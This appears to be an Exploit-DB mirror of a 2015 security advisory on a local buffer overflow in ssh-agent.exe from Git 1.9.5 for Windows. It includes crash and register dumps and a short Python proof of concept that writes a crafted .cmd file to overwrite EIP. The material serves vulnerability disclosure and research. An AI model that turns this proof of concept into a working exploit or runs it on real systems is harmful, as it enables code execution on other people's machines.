Git 1.9.5 – ‘ssh-agent.exe’ Buffer Overflow (PoC)

  • 作者: hyp3rlinx
    日期: 2015-09-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38336/
  • '''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt



Vendor:
================================
git-scm.com



Product:
================================
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=========================
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible.

Fault module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-------------
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B


Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOOOOOOOOOM! we control EIP.


Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax0xffffffff -1
ecx0x680a4c3a 1745505338
edx0x680a4c3a 1745505338
ebx0x28f90c 2685196
esp0x28f884 0x28f884
ebp0x41414141 0x41414141
esi0x28f8fc 2685180
edi0x2660 9824
eip0x41414141 0x41414141
eflags 0x10246[ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43



POC code(s):
===============

Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP.

Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it!

'''

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#======================================================

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "

x=open(file,"w")

eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")


print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "====================================\n"

'''
Disclosure Timeline:
=========================================================
Vendor Notification:August 10, 2015
Sept 26, 2015: Public Disclosure




Exploitation Technique:
=======================
Local



Description:
==========================================================
Vulnerable Product: [+]Git-1.9.5-preview20150319.exe



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
'''